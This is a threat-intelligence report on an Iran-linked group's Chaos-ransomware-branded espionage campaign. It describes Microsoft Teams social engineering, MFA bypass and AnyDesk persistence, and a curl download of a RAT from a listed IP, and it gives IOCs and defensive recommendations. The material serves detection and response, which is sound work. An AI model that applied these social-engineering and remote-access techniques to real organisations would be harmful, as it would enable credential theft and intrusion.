MuddyWater, an Iran-linked state-sponsored group, has begun conducting targeted espionage and sabotage operations under the banner of the Chaos ransomware gang, using Microsoft Teams for highly interactive social engineering, credential theft, and multi-factor authentication bypass, while avoiding encryption and focusing on stealthy persistence and data exfiltration. This directly impacts organizations in the US and the Middle East and requires rethinking the handling of incidents that look like “ordinary” ransomware attacks but may in fact be pursuing Iran’s strategic objectives.

Technical details of MuddyWater’s Chaos-branded campaign

In the incident investigated by Rapid7 (early 2026), MuddyWater imitates the tradecraft of the Chaos RaaS group but changes the key objective: instead of encryption, the focus is on espionage activity and maintaining a foothold in the victim infrastructure.

Initial access: Microsoft Teams as a channel for high-touch social engineering

• The attack starts with external chats in Microsoft Teams: the attackers reach out to employees directly, often posing as IT support.
• Interactive screen sharing is used: the operator literally walks the victim through what to click and what to type.
• During the session:
  • basic environment reconnaissance commands are executed;
  • VPN configuration files are opened;
  • users are asked to enter their login/password into locally created text files.
• Using the obtained credentials, the attackers bypass MFA by manipulating the user during the authentication process.

In the terminology of MITRE ATT&CK T1566 (Phishing), this is not a classic email phishing campaign but a more dangerous variant of direct social engineering in a corporate messenger, where the line between “support” and an attacker is almost completely blurred for the employee.

Persistence and movement: reliance on legitimate remote management tools

• For persistence, DWAgent and AnyDesk are used, as well as built-in capabilities such as RDP.
• In at least one case, AnyDesk is installed directly during the screen sharing session.
• Via RDP, the attacker launches curl to download the executable ms_upd.exe from an external server at 172.86.126[.]208.
• This binary initiates a multi-stage infection chain and deploys a RAT:
  • persistent connection to C2;
  • polling the command server every 60 seconds;
  • execution of system commands and PowerShell scripts;
  • file operations;
  • an interactive cmd.exe or PowerShell shell on operator request.

This tactic maps well to T1078 (Valid Accounts) and T1105 (Ingress Tool Transfer): instead of brute-forcing their way in, the attackers move to living inside the infrastructure while masquerading as legitimate users and using legitimate tools.

Fake ransomware artefacts and the role of the certificate

• Within the victim’s infrastructure, artefacts linked to Chaos ransomware are observed (branding, extortion playbooks). However:
  • no file encryption takes place;
  • the emphasis is on data exfiltration and building long-term access;
  • “ransom” negotiations are carried out over email.
• A critical attribution indicator is the use of a code-signing certificate with the subject “Donald Gay” to sign ms_upd.exe.
• The same certificate was previously used in the MuddyWater cluster to sign the CastleLoader (Fakeset) loader, which installs CastleRAT and other components.

It is precisely the certificate linkage, not the ransomware “brand”, that provides a reliable technical bridge between the current campaign and MuddyWater’s historical activity.

IOCs from the described campaign

• C2 / downloader IP address: 172.86.126[.]208
• Infrastructure IP address in the operation against Oman: 172.86.76[.]127
• Executable file: ms_upd.exe
• Code-signing certificate: subject "Donald Gay"
• RMM tools in a suspicious context: DWAgent, AnyDesk, Microsoft Quick Assist

MuddyWater group context and use of the criminal ecosystem

MuddyWater (also known as Seedworm, Mango Sandstorm, Static Kitten) has long been associated with Iran and is documented in MITRE’s profile as G0069. The current campaign is a logical continuation of its evolution.

From destructive “pseudo-ransomware” to deeply integrated RaaS

• 2020: attacks on Israeli organizations using the PowGoop loader, which deployed a modified Thanos variant with destructive capabilities.
• 2023: collaboration with the DEV‑1084 cluster (persona DarkBit) for destructive attacks masquerading as ransomware.
• October 2025: use of the Qilin ransomware against an Israeli public hospital via an affiliate partner program.

In each of these cases, ransomware was not the ultimate goal but rather a cover for destruction, coercion, and concealing intelligence objectives. In the new MuddyWater campaign under the “Chaos” brand, this becomes even more evident:

• methods and services typical of the commercial RaaS model are used (double, triple, and in some cases quadruple extortion — adding DDoS and pressure through contacting customers/competitors);
• however, instead of broad monetization there is a targeted interest in data, durable access, and specific organizations.

For SOC and IR teams, the main takeaway is: the presence of well-known ransomware “brands” in artefacts no longer guarantees that you are dealing with purely criminal extortion. It may be a state operation that uses the RaaS market as cover and logistics.

Other Iranian operations: Oman and the link to physical damage

Oman: open directory with C2 code and 26,000 user records

Hunt.io discovered an open directory on 172.86.76[.]127 containing:

• attack tooling and C2 code;
• session logs;
• archives of exfiltrated data.

The target was Oman’s Ministry of Justice and Legal Affairs (domain mjla.gov[.]om):

• more than 26,000 user records;
• data on court cases and committee decisions;
• dumps of the SAM and SYSTEM registry hives (a basis for further compromise of accounts and the domain engine).

Hacktivism and the port of Fujairah: linking cyber and kinetic domains

In parallel, Iran-aligned proxy structures (for example, Handala Hack) claim:

• publication of data on nearly 400 US Navy servicemembers in the Persian Gulf;
• compromise of the port of Fujairah in the UAE with the leak of around 11,000 documents (bills of lading, shipping and customs records);
• use of the stolen port infrastructure information to target missile strikes.

If these claims are confirmed, this will be one of the clearest examples of cyber operations directly preparing the ground for the physical destruction of infrastructure targets. For operators of ports, logistics, and energy assets, this means that a traditional focus on protecting IT assets is insufficient without simultaneously analyzing how such data can increase the effectiveness of kinetic strikes.

Impact assessment and risk profile

• Geographic risk distribution: the US (the main body of Chaos victims as of March 2026), Israel, Oman, the UAE, and the wider Middle East.
• Sectors:
  • construction, manufacturing, business services (typical Chaos targets);
  • healthcare (the Israeli hospital);
  • government and judicial sector (Oman);
  • port and transport/logistics infrastructure (Fujairah).
• Types of consequences if no action is taken:
  • long-term stealthy presence via RMM tools and valid accounts;
  • leakage of sensitive data (personal data, court decisions, internal infrastructure schematics);
  • use of data for political pressure, destabilization, or preparation of physical damage.

The highest risk is borne by organizations where RMM tools are widely used and poorly controlled, and where external communications in Teams are allowed by default.

Practical recommendations for defense and response

1. Strict control of Microsoft Teams and support channels

• Disable or restrict external chats in Teams to vetted partner domains.
• Configure alerts for:
  • screen sharing sessions initiated with external users;
  • bulk account operations or MFA setting changes performed during such sessions.
• Formalize a single IT support channel: employees must understand that any “support” outside this channel is suspicious.
• Include training with a specific scenario: “a person in Teams asks you to type your password into a text file / share your screen while entering your password” — this is a reason to immediately end the session and report it to security.

2. Management of RMM tools (DWAgent, AnyDesk, Quick Assist, etc.)

• Maintain an inventory of all approved remote administration tools.
• Implement application execution control (allow-list): any new RMM software outside the list is grounds for investigation.
• Monitor:
  • installation and execution of AnyDesk and DWAgent on servers and critical workstations;
  • outgoing sessions from this software to destinations outside corporate IP ranges.
• Prohibit the use of RDP from external addresses without VPN and strong authentication.

3. Strengthening authentication and countering social engineering around MFA

• Implement mechanisms such as number-matching and contextual prompts in MFA, making it harder to “pressure” a user via Teams.
• Limit the number of MFA prompts and lock the account after multiple denials (protection against MFA fatigue attacks).
• Minimize the presence of local administrators, especially on workstations of users who frequently interact externally (support, sales, port operators, etc.).

4. Searching for compromise traces and TTP-based threat hunting

• Review logs for:
  • connections to 172.86.126[.]208 and 172.86.76[.]127 (directly or via curl);
  • creation or execution of ms_upd.exe on servers and workstations;
  • installation/execution of AnyDesk and DWAgent in atypical network segments;
  • suspicious Microsoft Teams sessions with external users followed by activity from the same accounts in VPN/AD.
• Analyze all recently added trusted code-signing certificates; pay particular attention to subjects that do not match your policies (for example, “Donald Gay”).
• Build detection rules for T1041 (Exfiltration Over C2 Channel) scenarios, taking into account long-lived, low-noise RAT sessions with periodic C2 polling.

5. For the public sector and critical infrastructure in the region

• Segregate IT and operational technology (OT) networks, restricting routing between port, energy, and business system segments.
• Review supplier and contractor access to infrastructure management systems (including RMM and VPN). Any external access must be:
  • tied to a specific individual identity;
  • time-bound;
  • logged and recorded (session recording).
• Include in incident response plans a scenario in which a “ransomware incident” may be a cover for preparing a physical strike (by analogy with the Fujairah port case).

The key takeaway for organizations operating sensitive data and infrastructure is that any incident containing elements of ransomware should now be treated as a potential state-sponsored operation. The top practical priority should be to update response procedures: in addition to blocking the ransomware, include systematic hunting for hidden persistence via RMM tools, analysis of data exfiltration, and review of anomalous activity in Teams and other remote interaction channels.